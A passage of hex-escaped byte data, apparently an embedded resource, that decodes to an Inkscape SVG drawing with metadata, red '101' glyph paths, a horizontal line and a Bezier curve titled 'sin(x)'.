\x70\x65\x3a\x63\x75\x72\x72\x65\x6e\x74\x2d\x6c\x61\x79\x65\x72\
\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\x20\x20\x20\x73\
\x68\x6f\x77\x67\x72\x69\x64\x3d\x22\x66\x61\x6c\x73\x65\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\
\x6e\x64\x6f\x77\x2d\x77\x69\x64\x74\x68\x3d\x22\x31\x39\x32\x30\
\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x77\x69\x6e\x64\x6f\x77\x2d\x68\x65\x69\x67\x68\x74\x3d\x22\x31\
\x31\x34\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x78\x3d\x22\x30\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\
\x6e\x64\x6f\x77\x2d\x79\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\
\x6d\x61\x78\x69\x6d\x69\x7a\x65\x64\x3d\x22\x31\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x69\x64\
\x2d\x62\x62\x6f\x78\x3d\x22\x74\x72\x75\x65\x22\x20\x2f\x3e\x0a\
\x20\x20\x3c\x64\x65\x66\x73\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\
\x22\x64\x65\x66\x73\x35\x30\x33\x36\x22\x20\x2f\x3e\x0a\x20\x20\
\x3c\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x6d\x65\x74\x61\x64\x61\x74\x61\x35\x30\x33\x39\x22\
\x3e\x0a\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\x52\x44\x46\x3e\x0a\
\x20\x20\x20\x20\x20\x20\x3c\x63\x63\x3a\x57\x6f\x72\x6b\x0a\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x61\x62\x6f\x75\
\x74\x3d\x22\x22\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\
\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x69\x6d\x61\x67\x65\x2f\x73\
\x76\x67\x2b\x78\x6d\x6c\x3c\x2f\x64\x63\x3a\x66\x6f\x72\x6d\x61\
\x74\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\
\x79\x70\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\
\x64\x66\x3a\x72\x65\x73\x6f\x75\x72\x63\x65\x3d\x22\x68\x74\x74\
\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\x67\x2f\x64\x63\x2f\
\x64\x63\x6d\x69\x74\x79\x70\x65\x2f\x53\x74\x69\x6c\x6c\x49\x6d\
\x61\x67\x65\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x3c\x2f\x64\x63\x3a\x74\
\x69\x74\x6c\x65\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\x63\
\x3a\x57\x6f\x72\x6b\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\
\x3a\x52\x44\x46\x3e\x0a\x20\x20\x3c\x2f\x6d\x65\x74\x61\x64\x61\
\x74\x61\x3e\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\x6e\
\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\x45\x62\
\x65\x6e\x65\x20\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\x64\x65\x3d\x22\
\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\
\x6c\x61\x79\x65\x72\x31\x22\x3e\x0a\x20\x20\x20\x20\x3c\x67\x0a\
\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x74\x65\x78\x74\x35\
\x38\x30\x35\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\
\x65\x3d\x22\x66\x6f\x6e\x74\x2d\x73\x74\x79\x6c\x65\x3a\x6e\x6f\
\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x76\x61\x72\x69\x61\x6e\
\x74\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\x74\x2d\x77\x65\
\x69\x67\x68\x74\x3a\x39\x30\x30\x3b\x66\x6f\x6e\x74\x2d\x73\x74\
\x72\x65\x74\x63\x68\x3a\x6e\x6f\x72\x6d\x61\x6c\x3b\x66\x6f\x6e\
\x74\x2d\x73\x69\x7a\x65\x3a\x39\x2e\x33\x33\x33\x33\x33\x33\x30\
\x32\x70\x78\x3b\x6c\x69\x6e\x65\x2d\x68\x65\x69\x67\x68\x74\x3a\
\x31\x2e\x32\x35\x3b\x66\x6f\x6e\x74\x2d\x66\x61\x6d\x69\x6c\x79\
\x3a\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\x64\x65\x20\x50\x72\
\x6f\x27\x3b\x2d\x69\x6e\x6b\x73\x63\x61\x70\x65\x2d\x66\x6f\x6e\
\x74\x2d\x73\x70\x65\x63\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x3a\
\x27\x53\x6f\x75\x72\x63\x65\x20\x43\x6f\x64\x65\x20\x50\x72\x6f\
\x20\x48\x65\x61\x76\x79\x27\x3b\x6c\x65\x74\x74\x65\x72\x2d\x73\
\x70\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x77\x6f\x72\x64\x2d\
\x73\x70\x61\x63\x69\x6e\x67\x3a\x30\x70\x78\x3b\x66\x69\x6c\x6c\
\x3a\x23\x66\x66\x30\x30\x30\x30\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\
\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x6e\
\x6f\x6e\x65\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x61\x72\x69\x61\
\x2d\x6c\x61\x62\x65\x6c\x3d\x22\x31\x30\x31\x22\x3e\x0a\x20\x20\
\x20\x20\x20\x20\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x35\x38\x34\x37\x22\
\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\
\x22\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x3d\x22\x4d\
\x20\x30\x2e\x32\x37\x31\x39\x39\x39\x39\x39\x2c\x36\x2e\x33\x38\
\x38\x20\x48\x20\x34\x2e\x36\x30\x32\x36\x36\x36\x35\x20\x56\x20\
\x35\x2e\x31\x30\x30\x30\x30\x30\x31\x20\x48\x20\x33\x2e\x33\x33\
\x33\x33\x33\x33\x32\x20\x56\x20\x30\x2e\x34\x37\x30\x36\x36\x36\
\x38\x38\x20\x48\x20\x32\x2e\x31\x35\x37\x33\x33\x33\x33\x20\x43\
\x20\x31\x2e\x36\x39\x30\x36\x36\x36\x36\x2c\x30\x2e\x37\x35\x30\
\x36\x36\x36\x38\x37\x20\x31\x2e\x32\x32\x34\x2c\x30\x2e\x39\x31\
\x38\x36\x36\x36\x38\x36\x20\x30\x2e\x35\x31\x34\x36\x36\x36\x36\
\x35\x2c\x31\x2e\x30\x34\x39\x33\x33\x33\x35\x20\x56\x20\x32\x2e\
\x30\x33\x38\x36\x36\x36\x38\x20\x48\x20\x31\x2e\x37\x32\x37\x39\
\x39\x39\x39\x20\x56\x20\x35\x2e\x31\x30\x30\x30\x30\x30\x31\x20\
\x48\x20\x30\x2e\x32\x37\x31\x39\x39\x39\x39\x39\x20\x5a\x22\x20\
\x2f\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x70\x61\x74\x68\x0a\x20\
\x20\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\
\x35\x38\x34\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\
\x74\x79\x6c\x65\x3d\x22\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x20\x64\x3d\x22\x6d\x20\x37\x2e\x39\x35\x39\x30\x32\x30\x36\x2c\
\x36\x2e\x35\x20\x63\x20\x31\x2e\x33\x39\x30\x36\x36\x36\x36\x2c\
\x30\x20\x32\x2e\x33\x33\x33\x33\x33\x33\x34\x2c\x2d\x31\x2e\x30\
\x37\x33\x33\x33\x33\x33\x20\x32\x2e\x33\x33\x33\x33\x33\x33\x34\
\x2c\x2d\x33\x2e\x30\x39\x38\x36\x36\x36\x36\x20\x30\x2c\x2d\x32\
\x2e\x30\x32\x35\x33\x33\x33\x32\x20\x2d\x30\x2e\x39\x34\x32\x36\
\x36\x36\x38\x2c\x2d\x33\x2e\x30\x34\x32\x36\x36\x36\x35\x32\x20\
\x2d\x32\x2e\x33\x33\x33\x33\x33\x33\x34\x2c\x2d\x33\x2e\x30\x34\
\x32\x36\x36\x36\x35\x32\x20\x2d\x31\x2e\x33\x39\x30\x36\x36\x36\
\x36\x2c\x30\x20\x2d\x32\x2e\x33\x33\x33\x33\x33\x33\x33\x2c\x31\
\x2e\x30\x31\x37\x33\x33\x33\x33\x32\x20\x2d\x32\x2e\x33\x33\x33\
\x33\x33\x33\x33\x2c\x33\x2e\x30\x34\x32\x36\x36\x36\x35\x32\x20\
\x43\x20\x35\x2e\x36\x32\x35\x36\x38\x37\x33\x2c\x35\x2e\x34\x32\
\x36\x36\x36\x36\x37\x20\x36\x2e\x35\x36\x38\x33\x35\x34\x2c\x36\
\x2e\x35\x20\x37\x2e\x39\x35\x39\x30\x32\x30\x36\x2c\x36\x2e\x35\
\x20\x5a\x20\x6d\x20\x30\x2c\x2d\x31\x2e\x32\x33\x32\x20\x43\x20\
\x37\x2e\x34\x36\x34\x33\x35\x33\x39\x2c\x35\x2e\x32\x36\x38\x20\
\x37\x2e\x30\x34\x34\x33\x35\x34\x2c\x34\x2e\x38\x37\x36\x30\x30\
\x30\x31\x20\x37\x2e\x30\x34\x34\x33\x35\x34\x2c\x33\x2e\x34\x30\
\x31\x33\x33\x33\x34\x20\x63\x20\x30\x2c\x2d\x31\x2e\x34\x37\x34\
\x36\x36\x36\x36\x20\x30\x2e\x34\x31\x39\x39\x39\x39\x39\x2c\x2d\
\x31\x2e\x38\x31\x30\x36\x36\x36\x36\x20\x30\x2e\x39\x31\x34\x36\
\x36\x36\x36\x2c\x2d\x31\x2e\x38\x31\x30\x36\x36\x36\x36\x20\x30\
\x2e\x34\x39\x34\x36\x36\x36\x36\x2c\x30\x20\x30\x2e\x39\x31\x34\
\x36\x36\x36\x36\x2c\x30\x2e\x33\x33\x36\x20\x30\x2e\x39\x31\x34\
\x36\x36\x36\x36\x2c\x31\x2e\x38\x31\x30\x36\x36\x36\x36\x20\x30\
\x2c\x31\x2e\x34\x37\x34\x36\x36\x36\x37\x20\x2d\x30\x2e\x34\x32\
\x2c\x31\x2e\x38\x36\x36\x36\x36\x36\x36\x20\x2d\x30\x2e\x39\x31\
\x34\x36\x36\x36\x36\x2c\x31\x2e\x38\x36\x36\x36\x36\x36\x36\x20\
\x7a\x20\x6d\x20\x30\x2c\x2d\x31\x2e\x31\x31\x39\x39\x39\x39\x39\
\x20\x63\x20\x30\x2e\x34\x32\x39\x33\x33\x33\x33\x2c\x30\x20\x30\
\x2e\x37\x34\x36\x36\x36\x36\x36\x2c\x2d\x30\x2e\x32\x39\x38\x36\
\x36\x36\x37\x20\x30\x2e\x37\x34\x36\x36\x36\x36\x36\x2c\x2d\x30\
\x2e\x37\x34\x36\x36\x36\x36\x37\x20\x30\x2c\x2d\x30\x2e\x34\x34\
\x37\x39\x39\x39\x39\x20\x2d\x30\x2e\x33\x31\x37\x33\x33\x33\x33\
\x2c\x2d\x30\x2e\x37\x34\x36\x36\x36\x36\x36\x20\x2d\x30\x2e\x37\
\x34\x36\x36\x36\x36\x36\x2c\x2d\x30\x2e\x37\x34\x36\x36\x36\x36\
\x36\x20\x2d\x30\x2e\x34\x32\x39\x33\x33\x33\x33\x2c\x30\x20\x2d\
\x30\x2e\x37\x34\x36\x36\x36\x36\x36\x2c\x30\x2e\x32\x39\x38\x36\
\x36\x36\x37\x20\x2d\x30\x2e\x37\x34\x36\x36\x36\x36\x36\x2c\x30\
\x2e\x37\x34\x36\x36\x36\x36\x36\x20\x30\x2c\x30\x2e\x34\x34\x38\
\x20\x30\x2e\x33\x31\x37\x33\x33\x33\x33\x2c\x30\x2e\x37\x34\x36\
\x36\x36\x36\x37\x20\x30\x2e\x37\x34\x36\x36\x36\x36\x36\x2c\x30\
\x2e\x37\x34\x36\x36\x36\x36\x37\x20\x7a\x22\x20\x2f\x3e\x0a\x20\
\x20\x20\x20\x20\x20\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x35\x38\x35\x31\
\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\
\x3d\x22\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x3d\x22\
\x6d\x20\x31\x31\x2e\x34\x36\x34\x37\x30\x38\x2c\x36\x2e\x33\x38\
\x38\x20\x68\x20\x34\x2e\x33\x33\x30\x36\x36\x37\x20\x56\x20\x35\
\x2e\x31\x30\x30\x30\x30\x30\x31\x20\x48\x20\x31\x34\x2e\x35\x32\
\x36\x30\x34\x31\x20\x56\x20\x30\x2e\x34\x37\x30\x36\x36\x36\x38\
\x38\x20\x68\x20\x2d\x31\x2e\x31\x37\x36\x20\x43\x20\x31\x32\x2e\
\x38\x38\x33\x33\x37\x35\x2c\x30\x2e\x37\x35\x30\x36\x36\x36\x38\
\x37\x20\x31\x32\x2e\x34\x31\x36\x37\x30\x38\x2c\x30\x2e\x39\x31\
\x38\x36\x36\x36\x38\x36\x20\x31\x31\x2e\x37\x30\x37\x33\x37\x35\
\x2c\x31\x2e\x30\x34\x39\x33\x33\x33\x35\x20\x76\x20\x30\x2e\x39\
\x38\x39\x33\x33\x33\x33\x20\x68\x20\x31\x2e\x32\x31\x33\x33\x33\
\x33\x20\x76\x20\x33\x2e\x30\x36\x31\x33\x33\x33\x33\x20\x68\x20\
\x2d\x31\x2e\x34\x35\x36\x20\x7a\x22\x20\x2f\x3e\x0a\x20\x20\x20\
\x20\x3c\x2f\x67\x3e\x0a\x20\x20\x20\x20\x3c\x70\x61\x74\x68\x0a\
\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x63\x6f\x6e\x6e\x65\x63\x74\x6f\x72\x2d\x63\x75\x72\x76\x61\x74\
\x75\x72\x65\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x70\x61\x74\x68\x35\x38\x34\x35\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x64\x3d\x22\x4d\x20\x30\x2c\x37\x2e\x35\x30\x30\
\x34\x38\x37\x36\x20\x48\x20\x31\x36\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x6e\x6f\
\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x23\x30\x30\x30\x30\x30\
\x30\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x30\
\x2e\x39\x39\x39\x30\x32\x34\x38\x37\x70\x78\x3b\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x63\x61\x70\x3a\x62\x75\x74\x74\x3b\
\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3a\
\x6d\x69\x74\x65\x72\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6f\x70\x61\
\x63\x69\x74\x79\x3a\x31\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\
\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\
\x70\x61\x74\x68\x35\x38\x39\x34\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x74\x69\x74\x6c\x65\x3d\x22\x73\x69\x6e\x28\x78\x29\x22\x0a\
\x20\x20\x20\x20\x20\x20\x20\x64\x3d\x22\x20\x4d\x20\x30\x2e\x35\
\x32\x30\x30\x37\x39\x30\x38\x20\x31\x32\x2e\x31\x35\x31\x32\x34\
\x34\x39\x20\x43\x20\x30\x2e\x35\x32\x36\x33\x32\x30\x31\x34\x38\
\x38\x33\x36\x20\x31\x32\x2e\x31\x39\x33\x32\x39\x31\x34\x36\x34\
\x39\x20\x30\x2e\x35\x33\x32\x35\x36\x31\x32\x31\x37\x36\x37\x32\
\x20\x31\x32\x2e\x32\x33\x35\x33\x33\x37\x39\x39\x35\x37\x20\x30\
\x2e\x35\x33\x38\x38\x30\x32\x32\x38\x36\x35\x30\x38\x20\x31\x32\
\x2e\x32\x37\x37\x33\x35\x32\x30\x39\x35\x35\x20\x43\x20\x30\x2e\
\x35\x34\x35\x30\x34\x33\x33\x35\x35\x33\x34\x34\x20\x31\x32\x2e\
\x33\x31\x39\x33\x36\x36\x31\x39\x35\x34\x20\x30\x2e\x35\x35\x31\
\x32\x38\x34\x34\x32\x34\x31\x38\x20\x31\x32\x2e\x33\x36\x31\x33\
\x34\x37\x36\x36\x36\x31\x20\x30\x2e\x35\x35\x37\x35\x32\x35\x34\
\x39\x33\x30\x31\x36\x20\x31\x32\x2e\x34\x30\x33\x32\x36\x34\x33\
\x35\x36\x20\x43\x20\x30\x2e\x35\x36\x33\x37\x36\x36\x35\x36\x31\
\x38\x35\x32\x20\x31\x32\x2e\x34\x34\x35\x31\x38\x31\x30\x34\x35\
\x38\x20\x30\x2e\x35\x37\x30\x30\x30\x37\x36\x33\x30\x36\x38\x38\
\x20\x31\x32\x2e\x34\x38\x37\x30\x33\x32\x35\x36\x32\x20\x30\x2e\
\x35\x37\x36\x32\x34\x38\x36\x39\x39\x35\x32\x34\x20\x31\x32\x2e\
\x35\x32\x38\x37\x38\x37\x30\x34\x37\x35\x20\x43\x20\x30\x2e\x35\
\x38\x32\x34\x38\x39\x37\x36\x38\x33\x36\x31\x20\x31\x32\x2e\x35\
\x37\x30\x35\x34\x31\x35\x33\x33\x20\x30\x2e\x35\x38\x38\x37\x33\
\x30\x38\x33\x37\x31\x39\x36\x20\x31\x32\x2e\x36\x31\x32\x31\x39\
\x38\x34\x30\x31\x20\x30\x2e\x35\x39\x34\x39\x37\x31\x39\x30\x36\
\x30\x33\x33\x20\x31\x32\x2e\x36\x35\x33\x37\x32\x36\x31\x33\x38\
\x34\x20\x43\x20\x30\x2e\x36\x30\x31\x32\x31\x32\x39\x37\x34\x38\
\x36\x39\x20\x31\x32\x2e\x36\x39\x35\x32\x35\x33\x38\x37\x35\x39\
\x20\x30\x2e\x36\x30\x37\x34\x35\x34\x30\x34\x33\x37\x30\x35\x20\
\x31\x32\x2e\x37\x33\x36\x36\x35\x31\x37\x30\x33\x20\x30\x2e\x36\
\x31\x33\x36\x39\x35\x31\x31\x32\x35\x34\x31\x20\x31\x32\x2e\x37\
\x37\x37\x38\x38\x38\x34\x39\x39\x34\x20\x43\x20\x30\x2e\x36\x31\
\x39\x39\x33\x36\x31\x38\x31\x33\x37\x37\x20\x31\x32\x2e\x38\x31\
\x39\x31\x32\x35\x32\x39\x35\x38\x20\x30\x2e\x36\x32\x36\x31\x37\
\x37\x32\x35\x30\x32\x31\x33\x20\x31\x32\x2e\x38\x36\x30\x32\x30\
\x30\x30\x38\x39\x37\x20\x30\x2e\x36\x33\x32\x34\x31\x38\x33\x31\
\x39\x30\x34\x39\x20\x31\x32\x2e\x39\x30\x31\x30\x38\x32\x32\x30\
\x31\x35\x20\x43\x20\x30\x2e\x36\x33\x38\x36\x35\x39\x33\x38\x37\
\x38\x38\x35\x20\x31\x32\x2e\x39\x34\x31\x39\x36\x34\x33\x31\x33\
\x34\x20\x30\x2e\x36\x34\x34\x39\x30\x30\x34\x35\x36\x37\x32\x31\
\x20\x31\x32\x2e\x39\x38\x32\x36\x35\x32\x35\x38\x31\x31\x20\x30\
\x2e\x36\x35\x31\x31\x34\x31\x35\x32\x35\x35\x35\x37\x20\x31\x33\
\x2e\x30\x32\x33\x31\x31\x36\x38\x31\x33\x33\x20\x43\x20\x30\x2e\
\x36\x35\x37\x33\x38\x32\x35\x39\x34\x33\x39\x33\x20\x31\x33\x2e\
\x30\x36\x33\x35\x38\x31\x30\x34\x35\x36\x20\x30\x2e\x36\x36\x33\
\x36\x32\x33\x36\x36\x33\x32\x32\x39\x20\x31\x33\x2e\x31\x30\x33\
\x38\x31\x39\x38\x39\x31\x36\x20\x30\x2e\x36\x36\x39\x38\x36\x34\
\x37\x33\x32\x30\x36\x35\x20\x31\x33\x2e\x31\x34\x33\x38\x30\x33\
\x36\x39\x35\x31\x20\x43\x20\x30\x2e\x36\x37\x36\x31\x30\x35\x38\
\x30\x30\x39\x30\x31\x20\x31\x33\x2e\x31\x38\x33\x37\x38\x37\x34\
\x39\x38\x35\x20\x30\x2e\x36\x38\x32\x33\x34\x36\x38\x36\x39\x37\
\x33\x37\x20\x31\x33\x2e\x32\x32\x33\x35\x31\x34\x37\x32\x32\x31\
\x20\x30\x2e\x36\x38\x38\x35\x38\x37\x39\x33\x38\x35\x37\x33\x20\
\x31\x33\x2e\x32\x36\x32\x39\x35\x36\x32\x39\x30\x33\x20\x43\x20\
\x30\x2e\x36\x39\x34\x38\x32\x39\x30\x30\x37\x34\x30\x39\x20\x31\
\x33\x2e\x33\x30\x32\x33\x39\x37\x38\x35\x38\x34\x20\x30\x2e\x37\
\x30\x31\x30\x37\x30\x30\x37\x36\x32\x34\x35\x20\x31\x33\x2e\x33\
\x34\x31\x35\x35\x32\x30\x34\x39\x37\x20\x30\x2e\x37\x30\x37\x33\
\x31\x31\x31\x34\x35\x30\x38\x31\x20\x31\x33\x2e\x33\x38\x30\x33\
\x39\x30\x34\x31\x34\x31\x20\x43\x20\x30\x2e\x37\x31\x33\x35\x35\
\x32\x32\x31\x33\x39\x31\x37\x20\x31\x33\x2e\x34\x31\x39\x32\x32\
\x38\x37\x37\x38\x36\x20\x30\x2e\x37\x31\x39\x37\x39\x33\x32\x38\
\x32\x37\x35\x33\x20\x31\x33\x2e\x34\x35\x37\x37\x34\x39\x34\x31\
\x33\x34\x20\x30\x2e\x37\x32\x36\x30\x33\x34\x33\x35\x31\x35\x38\
\x39\x20\x31\x33\x2e\x34\x39\x35\x39\x32\x34\x35\x33\x38\x33\x20\
\x43\x20\x30\x2e\x37\x33\x32\x32\x37\x35\x34\x32\x30\x34\x32\x36\
\x20\x31\x33\x2e\x35\x33\x34\x30\x39\x39\x36\x36\x33\x31\x20\x30\
\x2e\x37\x33\x38\x35\x31\x36\x34\x38\x39\x32\x36\x31\x20\x31\x33\
\x2e\x35\x37\x31\x39\x32\x37\x31\x39\x36\x37\x20\x30\x2e\x37\x34\
\x34\x37\x35\x37\x35\x35\x38\x30\x39\x38\x20\x31\x33\x2e\x36\x30\
\x39\x33\x38\x30\x30\x37\x31\x33\x20\x43\x20\x30\x2e\x37\x35\x30\
\x39\x39\x38\x36\x32\x36\x39\x33\x34\x20\x31\x33\x2e\x36\x34\x36\
\x38\x33\x32\x39\x34\x35\x39\x20\x30\x2e\x37\x35\x37\x32\x33\x39\
\x36\x39\x35\x37\x37\x20\x31\x33\x2e\x36\x38\x33\x39\x30\x38\x39\
\x30\x34\x39\x20\x30\x2e\x37\x36\x33\x34\x38\x30\x37\x36\x34\x36\
\x30\x36\x20\x31\x33\x2e\x37\x32\x30\x35\x38\x31\x36\x33\x34\x39\
\x20\x43\x20\x30\x2e\x37\x36\x39\x37\x32\x31\x38\x33\x33\x34\x34\
\x32\x20\x31\x33\x2e\x37\x35\x37\x32\x35\x34\x33\x36\x35\x20\x30\
\x2e\x37\x37\x35\x39\x36\x32\x39\x30\x32\x32\x37\x38\x20\x31\x33\
\x2e\x37\x39\x33\x35\x32\x31\x34\x33\x37\x37\x20\x30\x2e\x37\x38\
\x32\x32\x30\x33\x39\x37\x31\x31\x31\x34\x20\x31\x33\x2e\x38\x32\
\x39\x33\x35\x37\x33\x33\x35\x20\x43\x20\x30\x2e\x37\x38\x38\x34\
\x34\x35\x30\x33\x39\x39\x35\x20\x31\x33\x2e\x38\x36\x35\x31\x39\
\x33\x32\x33\x32\x32\x20\x30\x2e\x37\x39\x34\x36\x38\x36\x31\x30\
\x38\x37\x38\x36\x20\x31\x33\x2e\x39\x30\x30\x35\x39\x35\x33\x35\
\x37\x35\x20\x30\x2e\x38\x30\x30\x39\x32\x37\x31\x37\x37\x36\x32\
\x32\x20\x31\x33\x2e\x39\x33\x35\x35\x33\x39\x30\x32\x37\x31\x20\
\x43\x20\x30\x2e\x38\x30\x37\x31\x36\x38\x32\x34\x36\x34\x35\x38\
\x20\x31\x33\x2e\x39\x37\x30\x34\x38\x32\x36\x39\x36\x38\x20\x30\
\x2e\x38\x31\x33\x34\x30\x39\x33\x31\x35\x32\x39\x34\x20\x31\x34\
\x2e\x30\x30\x34\x39\x36\x35\x31\x35\x30\x34\x20\x30\x2e\x38\x31\
\x39\x36\x35\x30\x33\x38\x34\x31\x33\x20\x31\x34\x2e\x30\x33\x38\
\x39\x36\x32\x35\x37\x36\x39\x20\x43\x20\x30\x2e\x38\x32\x35\x38\
\x39\x31\x34\x35\x32\x39\x36\x36\x20\x31\x34\x2e\x30\x37\x32\x39\
\x36\x30\x30\x30\x33\x35\x20\x30\x2e\x38\x33\x32\x31\x33\x32\x35\
\x32\x31\x38\x30\x32\x20\x31\x34\x2e\x31\x30\x36\x34\x36\x39\x34\
\x38\x32\x37\x20\x30\x2e\x38\x33\x38\x33\x37\x33\x35\x39\x30\x36\
\x33\x38\x20\x31\x34\x2e\x31\x33\x39\x34\x36\x38\x31\x31\x33\x33\
\x20\x43\x20\x30\x2e\x38\x34\x34\x36\x31\x34\x36\x35\x39\x34\x37\
\x34\x20\x31\x34\x2e\x31\x37\x32\x34\x36\x36\x37\x34\x33\x39\x20\
\x30\x2e\x38\x35\x30\x38\x35\x35\x37\x32\x38\x33\x31\x20\x31\x34\
\x2e\x32\x30\x34\x39\x35\x31\x34\x35\x30\x33\x20\x30\x2e\x38\x35\
\x37\x30\x39\x36\x37\x39\x37\x31\x34\x36\x20\x31\x34\x2e\x32\x33\
\x36\x39\x30\x30\x32\x37\x36\x20\x43\x20\x30\x2e\x38\x36\x33\x33\
\x33\x37\x38\x36\x35\x39\x38\x33\x20\x31\x34\x2e\x32\x36\x38\x38\
\x34\x39\x31\x30\x31\x37\x20\x30\x2e\x38\x36\x39\x35\x37\x38\x39\
\x33\x34\x38\x31\x38\x20\x31\x34\x2e\x33\x30\x30\x32\x35\x38\x38\
\x32\x30\x37\x20\x30\x2e\x38\x37\x35\x38\x32\x30\x30\x30\x33\x36\
\x35\x35\x20\x31\x34\x2e\x33\x33\x31\x31\x30\x38\x34\x35\x35\x34\
\x20\x43\x20\x30\x2e\x38\x38\x32\x30\x36\x31\x30\x37\x32\x34\x39\
\x31\x20\x31\x34\x2e\x33\x36\x31\x39\x35\x38\x30\x39\x30\x31\x20\
\x30\x2e\x38\x38\x38\x33\x30\x32\x31\x34\x31\x33\x32\x37\x20\x31\
\x34\x2e\x33\x39\x32\x32\x34\x34\x32\x36\x38\x39\x20\x30\x2e\x38\
\x39\x34\x35\x34\x33\x32\x31\x30\x31\x36\x33\x20\x31\x34\x2e\x34\
\x32\x31\x39\x34\x37\x30\x32\x35\x35\x20\x43\x20\x30\x2e\x39\x30\
\x30\x37\x38\x34\x32\x37\x38\x39\x39\x39\x20\x31\x34\x2e\x34\x35\
\x31\x36\x34\x39\x37\x38\x32\x31\x20\x30\x2e\x39\x30\x37\x30\x32\
\x35\x33\x34\x37\x38\x33\x35\x20\x31\x34\x2e\x34\x38\x30\x37\x36\
\x35\x36\x30\x34\x37\x20\x30\x2e\x39\x31\x33\x32\x36\x36\x34\x31\
\x36\x36\x37\x31\x20\x31\x34\x2e\x35\x30\x39\x32\x37\x35\x35\x36\
\x39\x20\x43\x20\x30\x2e\x39\x31\x39\x35\x30\x37\x34\x38\x35\x35\
\x30\x37\x20\x31\x34\x2e\x35\x33\x37\x37\x38\x35\x35\x33\x33\x34\
\x20\x30\x2e\x39\x32\x35\x37\x34\x38\x35\x35\x34\x33\x34\x33\x20\
\x31\x34\x2e\x35\x36\x35\x36\x38\x35\x39\x39\x32\x38\x20\x30\x2e\
\x39\x33\x31\x39\x38\x39\x36\x32\x33\x31\x37\x39\x20\x31\x34\x2e\
\x35\x39\x32\x39\x35\x39\x30\x39\x34\x35\x20\x43\x20\x30\x2e\x39\
\x33\x38\x32\x33\x30\x36\x39\x32\x30\x31\x35\x20\x31\x34\x2e\x36\
